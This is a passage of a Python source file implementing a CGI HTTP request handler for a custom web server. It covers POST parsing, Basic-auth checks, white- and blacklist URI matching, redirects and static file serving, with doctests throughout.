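# in the doctests (both values are placeholders). The expected header
# value is simply the base64 encoded credentials prefixed with "Basic ":
#
#     import base64
#     expected = base64.b64encode(b'login:password').decode('ascii')
#     header = 'Basic %s' % expected  # what the client would send
#     assert base64.b64decode(expected) == b'login:password'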
@JointPoint
# # python3.5 def _is_valid_reference(self: Self) -> builtins.bool:
def _is_valid_reference(self):
'''
Checks whether the request is a python module-, static- or \
dynamic file request. Returns "True" if so and "False" \
otherwise.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_is_valid_reference')
>>> handler.path = handler.requested_file.name
>>> handler._is_valid_reference()
False
>>> handler.requested_file.make_directory()
True
>>> handler._is_valid_reference()
True
>>> handler.requested_file = FileHandler(
... handler.requested_file.path +
... handler.server.web.authentication_file_name)
>>> handler.requested_file.content = 'hans:hans'
>>> handler._is_valid_reference()
False
>>> handler.requested_file = None
>>> handler.server.web.module_loading = True
>>> handler.path = 'doctest'
>>> handler._is_valid_reference()
True
'''
if((self.server.web.module_loading is True or
self.server.web.module_loading == self.path) and (
(self.path == '__main__' and __name__ != '__main__') or
Module.get_file_path(context_path=self.path))
):
self.load_module = True
return True
elif self.requested_file:
if self._is_valid_requested_file():
return True
return False
@JointPoint
# # python3.5 def _is_valid_requested_file(self: Self) -> builtins.bool:
def _is_valid_requested_file(self):
'''Determines if the current requested file points to a valid file.'''
patterns = self.server.web.dynamic_mime_type_pattern + \
self.server.web.static_mime_type_pattern
return (
self.requested_file.is_file() and self.requested_file.name !=
self.server.web.authentication_file_name and Iterable(
patterns
).is_in_pattern(
value=self.requested_file.mime_type
) is not False or self.server.web.directory_listing and
self.requested_file.is_directory())
@JointPoint
# # python3.5 def _is_dynamic(self: Self) -> builtins.bool:
def _is_dynamic(self):
'''
Determines if the current request points to a dynamic executable \
file or is a static type which should be sent back unmodified.
'''
return builtins.bool(self.load_module or Iterable(
self.server.web.dynamic_mime_type_pattern
).is_in_pattern(value=self.requested_file.mime_type))
# # # endregion
@JointPoint
# # python3.5
# # def _determine_logging_color(
# # self: Self, response_code: builtins.int
# # ) -> builtins.tuple:
def _determine_logging_color(self, response_code):
# #
'''
Determines a start and stop console escape sequence to mark given \
http status code with a suitable color.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler._determine_logging_color(100)
('', '')
>>> handler._determine_logging_color(200) == (
... '\\x1b[32m', '\\x1b[0m')
True
>>> handler._determine_logging_color(300) == (
... '\\x1b[34m', '\x1b[0m')
True
>>> handler._determine_logging_color(400) == (
... '\\x1b[33m', '\x1b[0m')
True
>>> handler._determine_logging_color(500) == (
... '\\x1b[31m', '\\x1b[0m')
True
'''
longest_match = 0
color_wrapper = '', ''
for status_code_prefix, output_color in (
self.server.web.STATUS_PREFIX_CODE_LOGGING_COLOR_MAPPING.items()
):
if longest_match < builtins.len(builtins.str(
status_code_prefix
)) and builtins.str(response_code).startswith(builtins.str(
status_code_prefix
)):
color_wrapper = (
SET_OUTPUT_ATTRIBUTE_MODE % output_color,
SET_OUTPUT_ATTRIBUTE_MODE % RESET_OUTPUT_ATTRIBUTE_MODE)
longest_match = builtins.len(builtins.str(status_code_prefix))
return color_wrapper
@JointPoint
# # python3.5
# # def _do_data_request(self: Self, type: builtins.str) -> Self:
def _do_data_request(self, type):
# #
'''Is triggered if a data carrying request comes in.'''
self.type = type[builtins.len('do_'):].lower()
# # python3.5
# # self.data_type, post_data = cgi.parse_header(
# # self.headers.get_content_type())
self.data_type, post_data = cgi.parse_header(
self.headers.gettype())
# #
content_length = builtins.int(self.headers.get('content-length', 0))
if not __test_mode__:
if self.data_type == 'application/x-www-form-urlencoded':
# # python3.5
# # self.data = parse_url_query(self.rfile.read(
# # content_length
# # ).decode(self.server.web.encoding))
self.data = cgi.parse_qs(
self.rfile.read(content_length),
keep_blank_values=True)
# #
for name, value in builtins.filter(
lambda item: Object(content=item[1]).is_binary(),
self.data.items()
):
self.data[name] = {'content': value}
elif self.data_type == 'multipart/form-data':
self.data = self._determine_data()
else:
'''NOTE: We can only read data once from the buffer.'''
content = self.rfile.read(content_length)
if self.data_type in ['application/json', 'text/plain']:
try:
# # python3.5
# # self.data = json.loads(content).decode(
# # self.server.web.encoding)
self.data = json.loads(
content, encoding=self.server.web.encoding)
# #
except builtins.ValueError:
self.data = {
'type': self.data_type, 'content': content}
else:
self.data = {'type': self.data_type, 'content': content}
# # python3.5
# # pass
if builtins.isinstance(self.data, builtins.dict):
self.data = Dictionary(self.data).convert(
key_wrapper=lambda key, value: convert_to_unicode(
key
) if builtins.isinstance(key, builtins.str) else key,
value_wrapper=lambda key, value: convert_to_unicode(
value
) if builtins.isinstance(key, builtins.str) else value
).content
else:
for key, value in builtins.enumerate(self.data):
self.data[key] = Dictionary(value).convert(
key_wrapper=lambda key, value: convert_to_unicode(
key
) if builtins.isinstance(
key, builtins.str
) else key, value_wrapper=lambda key, value: \
convert_to_unicode(
value
) if builtins.isinstance(
key, builtins.str
) else value
).content
# #
return self.do_GET()
@JointPoint
# # python3.5
# # def _get_login_data(
# # self: Self, authentication_file: FileHandler
# # ) -> builtins.str:
def _get_login_data(self, authentication_file):
# #
'''Determines needed login data for current request.'''
__logger__.info(
'Use authentication file "%s".', authentication_file._path)
# # python3.5
# # match = regularExpression.compile(
# # self.server.web.authentication_file_content_pattern
# # ).fullmatch(authentication_file.content.strip())
# # return base64_encode(('%s:%s' % (
# # match.group('name'), match.group('password')
# # )).encode(self.server.web.encoding)).decode(
# # self.server.web.encoding)
match = regularExpression.compile(
'(?:%s)$' % self.server.web.authentication_file_content_pattern
).match(authentication_file.content.strip())
return base64_encode(
'%s:%s' % (match.group('name'), match.group('password')))
# #
@JointPoint
# # python3.5 def _determine_data(self: Self) -> builtins.dict:
def _determine_data(self):
'''
Determines the post values given by an html form. File uploads \
are included as bytes.
'''
# # python3.5
# # form = cgi.FieldStorage(
# # fp=self.rfile, headers=self.headers, keep_blank_values=True,
# # strict_parsing=True,
# # environ=self._determine_environment_variables(),
# # encoding=self.server.web.encoding)
form = cgi.FieldStorage(
fp=self.rfile, headers=self.headers, keep_blank_values=True,
strict_parsing=True,
environ=self._determine_environment_variables())
# #
data = {}
for name in form:
data[name] = []
if builtins.hasattr(form[name], 'file') and form[name].filename:
data[name].append(form[name])
elif builtins.isinstance(form[name], builtins.list):
for value in form[name]:
if builtins.hasattr(value, 'file') and value.filename:
data[name].append(value)
else:
data[name].append(value.value)
else:
data[name].append(form[name].value)
return data
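# NOTE: A rough sketch of the mapping produced above for a multipart
# form; the field names "comment" and "upload" are hypothetical. Plain
# fields end up as a list of their string values while file uploads
# keep the whole cgi.FieldStorage item so filename and content stay
# accessible, e.g.:
#
#     {'comment': ['hello'], 'upload': [<cgi.FieldStorage for the file>]}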
@JointPoint
# # python3.5
# # def _determine_environment_variables(self: Self) -> os._Environ:
def _determine_environment_variables(self):
# #
'''
Determines all environment variables needed to parse the given \
post data with the cgi module.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('content-type: text/plain'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('content-type', 'text/plain')
>>> # #
>>> handler.command = ''
>>> dict(
... handler._determine_environment_variables()
... ) # doctest: +ELLIPSIS
{'...': '...'}
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'accept: text/plain\\nContent-Type: text/plain'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('accept', 'text/plain')
>>> # #
>>> dict(
... handler._determine_environment_variables()
... ) # doctest: +ELLIPSIS
{'...': '...'}
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'cookie: hans=peter'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans=peter')
>>> # #
>>> dict(
... handler._determine_environment_variables()
... ) # doctest: +ELLIPSIS
{'...': '...'}
'''
accept = []
if 'accept' in self.headers:
for line in self.headers['accept'].split('\n'):
accept += line.split(',')
variables = deepcopy(os.environ)
# # python3.5
# # variables.update({
# # 'HTTP_ACCEPT': ','.join(accept),
# # 'REQUEST_METHOD': self.command,
# # 'CONTENT_TYPE': self.headers.get_content_type(),
# # 'QUERY_STRING': self.parameter,
# # 'REMOTE_HOST': self.host,
# # 'CONTENT_LENGTH': self.headers.get('content-length', '0'),
# # 'HTTP_USER_AGENT': convert_to_unicode(self.headers.get(
# # 'user-agent', '')),
# # 'HTTP_COOKIE': convert_to_unicode(self.headers.get(
# # 'cookie', '')),
# # 'HTTP_REFERER': convert_to_unicode(self.headers.get(
# # 'referer', ''))
# # })
variables.update({
'HTTP_ACCEPT': ','.join(accept),
'REQUEST_METHOD': self.command,
'CONTENT_TYPE': convert_to_unicode(self.headers.get(
'content-type', 'text/plain')),
'QUERY_STRING': self.parameter,
'REMOTE_HOST': self.host,
'CONTENT_LENGTH': convert_to_unicode(self.headers.get(
'content-length', 0)),
'HTTP_USER_AGENT': convert_to_unicode(self.headers.get(
'user-agent', '')),
'HTTP_COOKIE': convert_to_unicode(self.headers.get(
'cookie', '')),
'HTTP_REFERER': convert_to_unicode(self.headers.get(
'referer', ''))
})
# #
for variable_name in variables:
# # python3.5
# # if variable_name.replace('_', '-').lower() in self.headers:
# # variables[variable_name] = self.headers.get(
# # variable_name.replace('_', '-').lower())
# # cookie_content = ', '.join(builtins.filter(
# # None, self.headers.get_all('cookie', [])))
# # if cookie_content:
# # variables['HTTP_COOKIE'] = cookie_content
if self.headers.get(
variable_name.replace('_', '-').lower(), False
):
variables[variable_name] = convert_to_unicode(
self.headers.get(variable_name.replace(
'_', '-').lower()))
# #
return variables
@JointPoint
# # python3.5
# # def _send_no_authorization_error(self: Self, output=None) -> Self:
def _send_no_authorization_error(self, output=None):
# #
'''This method is called if authentication failed.'''
self.send_response(401)
message = 'You requested a protected location'
# # python3.5
# # if 'authorization' in self.headers:
if self.headers.get('authorization', False):
# #
message = 'Requested authentication failed'
if not __test_mode__:
self.send_header(
'WWW-Authenticate', 'Basic realm=\"%s\"' % message)
self.send_header(
'Content-Type',
'text/html; charset=%s' % self.server.web.encoding)
self.end_headers()
return self._send_output(output)
@JointPoint
# # python3.5
# # def _send_no_file_error(
# # self: Self, valid_request=True, debug=False
# # ) -> Self:
def _send_no_file_error(self, valid_request=True, debug=False):
# #
'''
Generates an http 404 error if no useful file was found for \
responding.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> handler.requested_file = __test_folder__
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.server.web.module_loading = ''
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.server.web.module_loading = True
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.path = ''
>>> handler._send_no_file_error(debug=True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_send_no_file_error')
>>> handler.requested_file.content = ''
>>> handler._send_no_file_error(
... False, debug=True
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
error_message = 'Requested file not found'
if __logger__.isEnabledFor(logging.DEBUG) or sys.flags.debug or debug:
error_message = (
'Neither any of the following default module names "%s" nor '
'any of the following default file name patterns "%s" were found' %
('", "'.join(self.server.web.default_module_names),
'", "'.join(self.server.web.default_file_name_pattern)))
if builtins.isinstance(
self.server.web.module_loading, builtins.str
):
error_message = (
'Neither default module name "%s" nor any of the following'
' default file name patterns "%s" were found' % (
self.server.web.module_loading, '", "'.join(
self.server.web.default_file_name_pattern)))
elif not self.server.web.module_loading:
error_message = (
'None of the following default file name patterns "%s" '
'were found' % '", "'.join(
self.server.web.default_file_name_pattern))
if self.path:
error_message = ('No accessible file "%s" found' % FileHandler(
location=self.server.web.root.path + self.path
)._path)
if not valid_request:
error_message = (
"Given request isn't valid. Check your white- and "
'blacklists')
if self.requested_file.is_file():
error_message += \
'. Detected mime-type "%s"' % self.requested_file.mime_type
self.send_error(404, regularExpression.compile('\n+').sub(
'\n', error_message))
return self
@JointPoint
# # python3.5 def _is_valid_request(self: Self) -> builtins.bool:
def _is_valid_request(self):
'''Checks if given request fulfills all restrictions.'''
return self._request_in_pattern_list(
self.server.web.request_whitelist
) and not self._request_in_pattern_list(
self.server.web.request_blacklist)
@JointPoint
# # python3.5
# # def _request_in_pattern_list(
# # self: Self, pattern_list: NativeIterable
# # ) -> builtins.bool:
def _request_in_pattern_list(self, pattern_list):
# #
'''Checks if the current request matches one of the given patterns.'''
# # python3.5
# # patterns = regularExpression.compile(
# # '(?P<type>.+?):(?P<uri>.*)')
patterns = regularExpression.compile(
'^(?P<type>.+?):(?P<uri>.*)$')
# #
type_uppercase = self.external_type.upper()
for pattern in pattern_list:
# # python3.5 match = patterns.fullmatch(pattern)
match = patterns.match(pattern)
types = match.group('type').split('|')
# # python3.5
# # if(type_uppercase in types or
# # '*' in types
# # ) and regularExpression.compile(match.group(
# # 'uri'
# # )).fullmatch(self.external_uri) is not None:
if(type_uppercase in types or
'*' in types
) and regularExpression.compile('(?:%s)$' % match.group(
'uri'
)).match(self.external_uri) is not None:
# #
return True
return False
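# NOTE: A hedged sketch of the white-/blacklist entry format matched
# above: each entry is "TYPE:URI_REGEX" where TYPE is a "|" separated
# list of request methods or "*". The concrete entries are only
# illustrative and not defaults of this module:
#
#     request_whitelist = ('GET|HEAD:/static/.*', '*:/index.*')
#     # "GET /static/logo.png" matches the first entry while
#     # "POST /admin" matches neither and would be rejected.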
@JointPoint
# # python3.5 def _determine_host(self: Self) -> Self:
def _determine_host(self):
'''
Determines the full host name with port included (if it's not \
"80").
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.server.web.host_name = 'test'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'test: hans'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.server.web.port = 80
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'test'
>>> handler.server.web.port = 8080
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'accept: text/plain'
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('accept', 'text/plain')
>>> # #
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'test:8080'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('x-forwarded-host: hans\\nHost: hans'),
... seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('x-forwarded-host', 'hans')
... handler.headers.add_header('host', 'hans')
>>> # #
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'hans'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Host: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('host', 'hans')
>>> # #
>>> handler._determine_host() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.host
'hans'
'''
self.host = self.server.web.host_name
if self.server.web.port != 80:
self.host += ':%d' % self.server.web.port
# # python3.5
# # if 'x-forwarded-host' in self.headers:
# # self.host = self.headers.get('x-forwarded-host')
# # elif 'host' in self.headers:
# # self.host = self.headers.get('host')
if self.headers.get('x-forwarded-host', False):
self.host = convert_to_unicode(self.headers.get(
'x-forwarded-host'))
elif self.headers.get('host', False):
self.host = convert_to_unicode(self.headers.get('host'))
# #
return self
@JointPoint
# # python3.5
# # def _handle_redirect(self: Self, external=True) -> builtins.bool:
def _handle_redirect(self, external=True):
# #
'''
Deals with specified redirects. External Redirects will send an \
http redirection code.
'''
# # python3.5
# # patterns = regularExpression.compile(
# # '(?P<type>.+?):(?P<uri>.*)')
patterns = regularExpression.compile(
'(?P<type>.+?):(?P<uri>.*)$')
# #
type_uppercase = self.type.upper()
redirects = self.server.web.internal_redirects
if external:
redirects = self.server.web.external_redirects
for source, target in redirects:
# # python3.5 source_match = patterns.fullmatch(source)
source_match = patterns.match(source)
types = source_match.group('type').split('|')
# # python3.5
# # pattern = regularExpression.compile(source_match.group('uri'))
# # if(type_uppercase in types or
# # '*' in types
# # ) and pattern.fullmatch(
# # self.external_uri) is not None:
pattern = regularExpression.compile(
'(?:%s)$' % source_match.group('uri'))
if(type_uppercase in types or
'*' in types
) and pattern.match(self.external_uri) is not None:
# #
self._handle_matched_redirect(
pattern, patterns, target, external)
return True
return False
@JointPoint
# # python3.5
# # def _handle_matched_redirect(
# # self: Self, pattern: builtins.type(regularExpression.compile('')),
# # patterns: builtins.type(regularExpression.compile('')),
# # target: builtins.str, external: builtins.bool
# # ) -> Self:
def _handle_matched_redirect(
self, pattern, patterns, target, external
):
# #
'''Performs an internal or external redirect.'''
if external:
if not __test_mode__:
self.external_uri = pattern.sub(target, self.external_uri)
self.send_response(301).send_header(
'Location', self.external_uri)
self.end_headers()
else:
target_match = patterns.match(target)
if target_match.group('type') != '-':
self.type = target_match.group('type')
for request in target_match.group('uri').split('#'):
self.uri = pattern.sub(
request, self.external_uri
).format(host_name=regularExpression.compile(':[0-9]+$').sub(
'', self.host))
if FileHandler(location=self.uri):
break
return self
@JointPoint
# # python3.5
# # def _set_dynamic_or_static_get(
# # self: Self, file_name: builtins.str
# # ) -> Self:
def _set_dynamic_or_static_get(self, file_name):
# #
'''
Makes a dynamic or static response depending on the incoming request.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.load_module = True
>>> handler._set_dynamic_or_static_get('test') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
self.requested_file_name = file_name
if self._is_dynamic():
return self._dynamic_get()
return self._static_get()
@JointPoint
# # python3.5 def _default_get(self: Self) -> builtins.bool:
def _default_get(self):
'''
Handles every request which doesn't address a specific file or \
python module.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('cookie: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans')
>>> # #
>>> handler.requested_file = FileHandler(
... __test_folder__.path + 'index.py')
>>> handler.requested_file.content = ''
>>> handler._default_get()
True
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('cookie: hans=peter'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans=peter')
>>> # #
>>> handler.requested_file = FileHandler(
... __test_folder__.path + 'index.py')
>>> handler.requested_file.content = ''
>>> handler._default_get()
True
>>> handler.server.web.directory_listing = False
>>> handler.requested_file.remove_file()
True
>>> handler._default_get()
False
>>> handler.server.web.module_loading = True
>>> handler.server.web.default = 'doctest'
>>> handler._default_get()
True
>>> handler.server.web.default = ''
>>> handler.server.web.default_module_names = 'doctest',
>>> handler.data['__no_respond__'] = True
>>> handler.respond = False
>>> handler._default_get()
True
'''
if self.server.web.default:
self._handle_given_default_get()
return True
if(self.server.web.module_loading and
self._is_default_module_requested()):
return True
for pattern in self.server.web.default_file_name_pattern:
# # python3.5
# # for file in builtins.filter(
# # lambda file: regularExpression.compile(
# # '(?:%s)$' % pattern
# # ).fullmatch(file.name), self.server.web.root.list()
# # ):
for file in builtins.filter(
lambda file: regularExpression.compile(
'(?:%s)$' % pattern
).match(file.name), self.server.web.root.list()
):
# #
self.requested_file = file
self._set_dynamic_or_static_get(file_name=file.name)
return True
if self.server.web.directory_listing:
self._static_get()
return True
return False
@JointPoint
# # python3.5
# # def _is_default_module_requested(self: Self) -> builtins.bool:
def _is_default_module_requested(self):
# #
'''
Handle a default module request if possible.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler._is_default_module_requested()
False
>>> handler.server.web = Web(
... __test_folder__, module_loading='doctest')
>>> handler._is_default_module_requested()
True
'''
if self.server.web.module_loading:
# # python3.5
# # if builtins.isinstance(
# # self.server.web.module_loading, builtins.str
# # ) and self._handle_default_modules_get(
# # self.server.web.module_loading
# # ):
if builtins.isinstance(
self.server.web.module_loading, builtins.unicode
) and self._handle_default_modules_get(
self.server.web.module_loading
):
# #
return True
for module_name in self.server.web.default_module_names:
if self._handle_default_modules_get(module_name):
return True
return False
@JointPoint
# # python3.5
# # def _handle_default_modules_get(
# # self: Self, module_name: builtins.str
# # ) -> (Self, builtins.bool):
def _handle_default_modules_get(self, module_name):
# #
'''
Handles requests which want the current default module \
(the initially called module) run in a server thread.
Examples:
>>> test_globals_backup = __test_globals__['__name__']
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler._handle_default_modules_get('not_existing')
False
>>> handler._handle_default_modules_get('__main__')
False
>>> __test_globals__['__name__'] = __module_name__
>>> handler._handle_default_modules_get(
... '__main__'
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and param...
>>> __test_globals__['__name__'] = test_globals_backup
'''
if module_name == '__main__':
if __name__ != '__main__':
self.load_module = True
return self._set_dynamic_or_static_get(file_name=module_name)
elif Module.get_file_path(context_path=module_name):
self.load_module = True
return self._set_dynamic_or_static_get(file_name=module_name)
return False
@JointPoint
# # python3.5 def _handle_given_default_get(self: Self) -> Self:
def _handle_given_default_get(self):
'''
Handles request with no explicit file or module to run.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('cookie: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans')
>>> # #
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler._handle_given_default_get() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...Determine "" as default file...'
>>> handler.server.web.module_loading = True
>>> handler.server.web.default = 'doctest'
>>> handler._handle_given_default_get() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...Determine "doctest" as default module...'
'''
if((self.server.web.module_loading is True or
self.server.web.module_loading == self.server.web.default) and
Module.get_file_path(context_path=self.server.web.default)):
self.load_module = True
__logger__.info(
'Determine "%s" as default module.', self.server.web.default)
self.requested_file = FileHandler(
location=self.server.web.root.path + self.server.web.default)
if self.requested_file:
__logger__.info(
'Determine "%s" as default file.', self.server.web.default)
return self._set_dynamic_or_static_get(
file_name=self.server.web.default)
@JointPoint
# # python3.5 def _static_get(self: Self) -> Self:
def _static_get(self):
'''
Handles a static file-request.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_static_get')
>>> handler.requested_file.content = ''
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String(
... 'if-modified-since: %s' % handler.date_time_string(
... int(handler.requested_file.timestamp))
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header(
... 'if-modified-since', handler.date_time_string(
... int(handler.requested_file.timestamp)))
>>> # #
>>> handler._static_get() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
if not __test_mode__ and self.requested_file.is_directory():
if self.data_type == 'multipart/form-data':
self._save_uploaded_files()
'''
If a directory was requested and no trailing slash was given, \
a 301 redirect to the same request with a trailing slash will \
be returned.
'''
if not regularExpression.compile(
'/(%s.*)?$' % self.server.web.request_parameter_delimiter
).search(self.external_uri):
self.send_response(301).send_header(
'Location', regularExpression.compile(
'((%s.*)?)$' %
self.server.web.request_parameter_delimiter
).sub('/\\1', self.external_uri))
return self.end_headers()
return self.list_directory()
try:
file_handler = builtins.open(self.requested_file._path, mode='rb')
except builtins.IOError:
self._send_no_file_error()
return self
# # python3.5
# # if(self.headers.get('if-modified-since') ==
# # self.date_time_string(
# # builtins.int(self.requested_file.timestamp))):
if(self.headers.get('if-modified-since') ==
self.date_time_string(
builtins.int(self.requested_file.timestamp))):
# #
return self._send_not_modified_header()
return self._send_static_file(output=file_handler)
@JointPoint
# # python3.5 def _save_uploaded_files(self: Self) -> Self:
def _save_uploaded_files(self):
'''
Data uploaded to a directory is saved automatically by this \
method.
'''
for items in self.data.values():
for item in items:
# # python3.5
# # if(builtins.len(item) == 4 and
# # 'content' in item and 'name' in item and
# # 'disposition' in item and
# # 'encoding' in item):
# # FileHandler(
# # self.requested_file.path + item['name'],
# # encoding=item['encoding']
# # ).set_content(content=item['content'], mode='w+b')
if(builtins.len(item) == 3 and
'content' in item and 'name' in item and
'disposition' in item):
FileHandler(
self.requested_file.path + item['name']
).set_content(content=item['content'], mode='w+b')
# #
return self
@JointPoint
# # python3.5
# # def _send_static_file(
# # self: Self, output: (builtins.str, _io.BufferedReader)
# # ) -> Self:
def _send_static_file(self, output):
# #
'''
Sends given output to client.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_static_get')
>>> handler.requested_file.content = ''
>>> handler.server.web.file_size_stream_threshold_in_byte = 0
>>> handler._send_static_file('') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
threshold = self.server.web.file_size_stream_threshold_in_byte
mime_type = self.requested_file.get_mime_type(web=True)
if(self.requested_file.size < threshold or
mime_type in self.server.web.known_big_web_mime_types):
# # python3.5
# # self.send_content_type_header(
# # mime_type=mime_type, encoding=builtins.isinstance(
# # output, builtins.str))
self.send_content_type_header(
mime_type=mime_type, encoding=builtins.isinstance(
output, builtins.unicode))
# #
else:
self.send_content_type_header(
mime_type='application/octet-stream', encoding=False)
if not __test_mode__:
self.send_header('Content-Transfer-Encoding', 'binary')
self.send_static_file_cache_header(
timestamp=self.requested_file.timestamp)
self.send_content_length_header(
size=builtins.int(self.requested_file.size))
self.end_headers()
return self._send_output(output)
@JointPoint
# # python3.5 def _send_not_modified_header(self: Self) -> Self:
def _send_not_modified_header(self):
'''Sends a header to client indicating cached file hasn't changed.'''
self.send_content_type_header(
mime_type=self.requested_file.mime_type, response_code=304
).send_static_file_cache_header(
timestamp=self.requested_file.timestamp
).send_content_length_header(
size=builtins.int(self.requested_file.size))
self.end_headers()
return self
@JointPoint
# # python3.5
# # def _send_output(
# # self: Self, output: (builtins.str, _io.BufferedReader)
# # ) -> Self:
